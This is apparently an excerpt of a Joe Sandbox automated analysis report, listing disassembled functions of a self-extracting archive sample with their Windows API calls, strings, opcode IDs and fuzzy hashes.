                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                                                                        • String ID: Thread pool initialization failed.
                                                                                                                                        • API String ID: 3340455307-2182114853
                                                                                                                                        • Opcode ID: 5292b9c12e578350f1d40057fc224f46e7b6569f7336dc414f8ef510b9616a18
                                                                                                                                        • Instruction ID: f125d51d073034272b7dde88d60e9721c8cefa27c89849c5a3440323dde91acf
                                                                                                                                        • Opcode Fuzzy Hash: 5292b9c12e578350f1d40057fc224f46e7b6569f7336dc414f8ef510b9616a18
                                                                                                                                        • Instruction Fuzzy Hash: AB115EB1600705AFD7205F65A889BA7FBECFB55355F10482EF2EAC2200DA796880CB90
                                                                                                                                        Function 007ABEE7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                                                                        • API String ID: 0-56093855
                                                                                                                                        • Opcode ID: f8c310c5cc1e749bb3b3e0447924d655bd98540432650f7789686e34f5aafb5d
                                                                                                                                        • Instruction ID: f63ad7411c33678e45957e2efc9b64373964210928cebc4ff6957379c30272b1
                                                                                                                                        • Opcode Fuzzy Hash: f8c310c5cc1e749bb3b3e0447924d655bd98540432650f7789686e34f5aafb5d
                                                                                                                                        • Instruction Fuzzy Hash: EF017571606245BFC3019B18EC80E26BBA9E7DA354F08862AF55592132D32E9C16DF69
                                                                                                                                        Function 0079CE48 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0079CE57
                                                                                                                                        • FindResourceW.KERNEL32(00000000,RTL,00000005), ref: 0079CE66
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FindHandleModuleResource
                                                                                                                                        • String ID: LTR$RTL
                                                                                                                                        • API String ID: 3537982541-719208805
                                                                                                                                        • Opcode ID: 0ad7e3e0e168f77a35ea7e08b5d6942c03b81d9c4f1e15b7244c793ee4d07309
                                                                                                                                        • Instruction ID: fd7abebde6a823adce387c5216aec10912733af3d4eaa0bf390287225b0e779d
                                                                                                                                        • Opcode Fuzzy Hash: 0ad7e3e0e168f77a35ea7e08b5d6942c03b81d9c4f1e15b7244c793ee4d07309
                                                                                                                                        • Instruction Fuzzy Hash: 06F02B31604318A7EB2466756C0EFA737ACE781710F04426DF646961C0DBA9994987F5
                                                                                                                                        Function 00799F2A Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,00797F55,?,?,?), ref: 00799FD0
                                                                                                                                        • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,00797F55,?,?), ref: 0079A014
                                                                                                                                        • SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,00797F55,?,?,?,?,?,?,?,?), ref: 0079A095
                                                                                                                                        • CloseHandle.KERNEL32(?,?,00000000,?,00797F55,?,?,?,?,?,?,?,?,?,?,?), ref: 0079A09C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$Create$CloseHandleTime
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2287278272-0
                                                                                                                                        • Opcode ID: a88addf37c134718b6669c923d56db1e994b7744f0649b00558090d3a488f389
                                                                                                                                        • Instruction ID: 8348a1b00baa767e9ae1b71591e0c8c78224c274b6c841619fd72a8694cfd16c
                                                                                                                                        • Opcode Fuzzy Hash: a88addf37c134718b6669c923d56db1e994b7744f0649b00558090d3a488f389
                                                                                                                                        • Instruction Fuzzy Hash: 2B41B131248385AAEB31DF28EC45FAEBBE9AB85700F04091DF5D5D31C1D678DA489793
                                                                                                                                        Function 007B93F3 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,F5E85006,007B2794,00000000,00000000,007B2FC2,?,007B2FC2,?,00000001,007B2794,F5E85006,00000001,007B2FC2,007B2FC2), ref: 007B9440
                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 007B94C9
                                                                                                                                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 007B94DB
                                                                                                                                        • __freea.LIBCMT ref: 007B94E4
                                                                                                                                          • Part of subcall function 007B59FC: RtlAllocateHeap.NTDLL(00000000,?,?,?,007B23AA,?,0000015D,?,?,?,?,007B2F29,000000FF,00000000,?,?), ref: 007B5A2E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2652629310-0
                                                                                                                                        • Opcode ID: b1afaba8d997d5ad3a47540f708c9fcaa955910f378f80ada287cf8521595748
                                                                                                                                        • Instruction ID: 5d12358bfd24e6f3abaa903b6833bffff8dc0b137a286660f183be03450b7637
                                                                                                                                        • Opcode Fuzzy Hash: b1afaba8d997d5ad3a47540f708c9fcaa955910f378f80ada287cf8521595748
                                                                                                                                        • Instruction Fuzzy Hash: 1431B072A0024AABDB299F68DC85EEF7BA5EF40710F054228FE15D7150EB39DD51CB90
                                                                                                                                        Function 007A9A76 Relevance: 6.1, APIs: 4, Instructions: 55windowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • LoadBitmapW.USER32(00000065), ref: 007A9A86
                                                                                                                                        • GetObjectW.GDI32(00000000,00000018,?), ref: 007A9AA7
                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 007A9ACF
                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 007A9AEE
                                                                                                                                          • Part of subcall function 007A8BD0: FindResourceW.KERNELBASE(00000066,PNG,?,?,007A9AC8,00000066), ref: 007A8BE1
                                                                                                                                          • Part of subcall function 007A8BD0: SizeofResource.KERNEL32(00000000,75295780,?,?,007A9AC8,00000066), ref: 007A8BF9
                                                                                                                                          • Part of subcall function 007A8BD0: LoadResource.KERNEL32(00000000,?,?,007A9AC8,00000066), ref: 007A8C0C
                                                                                                                                          • Part of subcall function 007A8BD0: LockResource.KERNEL32(00000000,?,?,007A9AC8,00000066), ref: 007A8C17
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 142272564-0
                                                                                                                                        • Opcode ID: 9465248e10bbff77d7d1f13d86558650db566871343242c9d16caa65031f38f2
                                                                                                                                        • Instruction ID: 41d7af4f9ee16d711d0c16a7e56ae7cccf6bad62f2c7f5147ffd4a9768d9e9d2
                                                                                                                                        • Opcode Fuzzy Hash: 9465248e10bbff77d7d1f13d86558650db566871343242c9d16caa65031f38f2
                                                                                                                                        • Instruction Fuzzy Hash: 7A01F77264121477C61177749C4AF7FB76DDFC6B51F088216FA00E7251DE198C1181F2
                                                                                                                                        Function 007B1009 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • ___BuildCatchObject.LIBVCRUNTIME ref: 007B1020
                                                                                                                                          • Part of subcall function 007B1658: ___AdjustPointer.LIBCMT ref: 007B16A2
                                                                                                                                        • _UnwindNestedFrames.LIBCMT ref: 007B1037
                                                                                                                                        • ___FrameUnwindToState.LIBVCRUNTIME ref: 007B1049
                                                                                                                                        • CallCatchBlock.LIBVCRUNTIME ref: 007B106D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2633735394-0
                                                                                                                                        • Opcode ID: 7d12082e9d69d4eb274960970e4ac3fc094051ebbb053271e04eeb65a8542b8b
                                                                                                                                        • Instruction ID: e6758849963e9966ddd51b89264494bc7eb0bce3ccbce02fef19c76b021e6053
                                                                                                                                        • Opcode Fuzzy Hash: 7d12082e9d69d4eb274960970e4ac3fc094051ebbb053271e04eeb65a8542b8b
                                                                                                                                        • Instruction Fuzzy Hash: 4B014C32000148FBCF226F55CC55FDA3BBAFF49754F554115F91865120C33AE8A1DBA0
                                                                                                                                        Function 007B0B66 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 007B0B66
                                                                                                                                        • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 007B0B6B
                                                                                                                                        • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 007B0B70
                                                                                                                                          • Part of subcall function 007B1C0E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 007B1C1F
                                                                                                                                        • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 007B0B85
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1761009282-0
                                                                                                                                        • Opcode ID: e1efccc91d6ca86c87a370a4cfe5ee176f52a00580c29e2aebafd7fd9b0014c7
                                                                                                                                        • Instruction ID: 3759c4f067394081be2ed00b2493951c6087d6aa793c912f86f29b4bde3c6747
                                                                                                                                        • Opcode Fuzzy Hash: e1efccc91d6ca86c87a370a4cfe5ee176f52a00580c29e2aebafd7fd9b0014c7
                                                                                                                                        • Instruction Fuzzy Hash: 7CC04CA4144240D81C203AB5292E3EF07510C627D97C015D9E891170175F0E444A90B6
                                                                                                                                        Function 007A8CF3 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 188COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 007A8BA5: GetDC.USER32(00000000), ref: 007A8BA9
                                                                                                                                          • Part of subcall function 007A8BA5: GetDeviceCaps.GDI32(00000000,0000000C), ref: 007A8BB4
                                                                                                                                          • Part of subcall function 007A8BA5: ReleaseDC.USER32(00000000,00000000), ref: 007A8BBF
                                                                                                                                        • GetObjectW.GDI32(?,00000018,?), ref: 007A8D24
                                                                                                                                          • Part of subcall function 007A8EEA: GetDC.USER32(00000000), ref: 007A8EF3
                                                                                                                                          • Part of subcall function 007A8EEA: GetObjectW.GDI32(?,00000018,?), ref: 007A8F22
                                                                                                                                          • Part of subcall function 007A8EEA: ReleaseDC.USER32(00000000,?), ref: 007A8FB6
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ObjectRelease$CapsDevice
                                                                                                                                        • String ID: (
                                                                                                                                        • API String ID: 1061551593-3887548279
                                                                                                                                        • Opcode ID: ea17af6f8c427578d6bbe31aeea3163fd429d39b54bf440668d8cf7f6dedbcdd
                                                                                                                                        • Instruction ID: 7d32d17e13c2edca89967fac369982e8463a5e7eb6039e7b32fc9f555f624889
                                                                                                                                        • Opcode Fuzzy Hash: ea17af6f8c427578d6bbe31aeea3163fd429d39b54bf440668d8cf7f6dedbcdd
                                                                                                                                        • Instruction Fuzzy Hash: B461F2B1208205EFD250DF64C888E6BBBE9FFC9715F104A5DF599CB260DA35E805CB62
                                                                                                                                        Function 007A01DF Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 178COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _swprintf
                                                                                                                                        • String ID: %ls$%s: %s
                                                                                                                                        • API String ID: 589789837-2259941744
                                                                                                                                        • Opcode ID: b33701f888ba248c3c10162c2e2e98630a1b4532bf8b11c221152e09267a284e
                                                                                                                                        • Instruction ID: 1d2cb387515f3f63b44ec85d7f031dffd30efa799a5545268c3dfa0d38fcddbe
                                                                                                                                        • Opcode Fuzzy Hash: b33701f888ba248c3c10162c2e2e98630a1b4532bf8b11c221152e09267a284e
                                                                                                                                        • Instruction Fuzzy Hash: 2A51B53618C300FAEE211A948C4EF257655BBCBF00F20CF0AB786640E6D5DEAC6466D6
                                                                                                                                        Function 00797619 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 131timeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • __EH_prolog.LIBCMT ref: 0079761E
                                                                                                                                        • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00797799
                                                                                                                                          • Part of subcall function 0079A0C3: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00799EF9,?,?,?,00799D92,?,00000001,00000000,?,?), ref: 0079A0D7
                                                                                                                                          • Part of subcall function 0079A0C3: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00799EF9,?,?,?,00799D92,?,00000001,00000000,?,?), ref: 0079A108
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$Attributes$H_prologTime
                                                                                                                                        • String ID: :
                                                                                                                                        • API String ID: 1861295151-336475711
                                                                                                                                        • Opcode ID: 54b167e35b7ef38f295ac7622c1a6938e9584d8ec1400d9775a6303603b22255
                                                                                                                                        • Instruction ID: dc65bd37785c5d71910bc0e271fe1707dbffea71eb901114ea2f0f0e8ba7de39
                                                                                                                                        • Opcode Fuzzy Hash: 54b167e35b7ef38f295ac7622c1a6938e9584d8ec1400d9775a6303603b22255
                                                                                                                                        • Instruction Fuzzy Hash: C941B571805658E9EF25EB64EC49EEF777CEF45300F0040A9B64592082DB3C5F85CBA1
                                                                                                                                        Function 0079B275 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: UNC$\\?\
                                                                                                                                        • API String ID: 0-253988292
                                                                                                                                        • Opcode ID: 485d6d5f2a1359ccaef04d7741eae75c45e46516eb5a595de1e1d6e5481d8c8a
                                                                                                                                        • Instruction ID: f680a17d940349c41bd630678945164133199d0f215f0f3b5005c16c9df49388
                                                                                                                                        • Opcode Fuzzy Hash: 485d6d5f2a1359ccaef04d7741eae75c45e46516eb5a595de1e1d6e5481d8c8a
                                                                                                                                        • Instruction Fuzzy Hash: 52418F31440259EBDF21EF61FD4AEEE7769EF01390F10452AF85493142E77CEA90CAA0
                                                                                                                                        Function 007A802D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 76COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: Shell.Explorer$about:blank
                                                                                                                                        • API String ID: 0-874089819
                                                                                                                                        • Opcode ID: 17b8836e4fe21a3c37801fc3de619c28bd2b26fe39c88ae702ee1fbdaa3bef7a
                                                                                                                                        • Instruction ID: 78f0b7ef079f09491916b3218aa67388dbdb0e36e6832e71da13f22752d0c15c
                                                                                                                                        • Opcode Fuzzy Hash: 17b8836e4fe21a3c37801fc3de619c28bd2b26fe39c88ae702ee1fbdaa3bef7a
                                                                                                                                        • Instruction Fuzzy Hash: 69215EB5310606EFD7549B64C894E27B768BFC6710B14C72EF5058B682CF69EC44CBA2
                                                                                                                                        Function 0079DF34 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0079DEB5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0079DED4
                                                                                                                                          • Part of subcall function 0079DEB5: GetProcAddress.KERNEL32(007D1E58,CryptUnprotectMemory), ref: 0079DEE4
                                                                                                                                        • GetCurrentProcessId.KERNEL32(?,?,?,0079DF2E), ref: 0079DFB5
                                                                                                                                        Strings
                                                                                                                                        • CryptProtectMemory failed, xrefs: 0079DF75
                                                                                                                                        • CryptUnprotectMemory failed, xrefs: 0079DFAD
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$CurrentProcess
                                                                                                                                        • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                                                                                                        • API String ID: 2190909847-396321323
                                                                                                                                        • Opcode ID: ef78923fe5d0a05abbf48e155aec4c7c149d5dba19830e1be057f0722c984e8c
                                                                                                                                        • Instruction ID: b2d9005ff85345f4aea18d6ba9dca77698d17ca51edcaf2491ee6ad91198f18a
                                                                                                                                        • Opcode Fuzzy Hash: ef78923fe5d0a05abbf48e155aec4c7c149d5dba19830e1be057f0722c984e8c
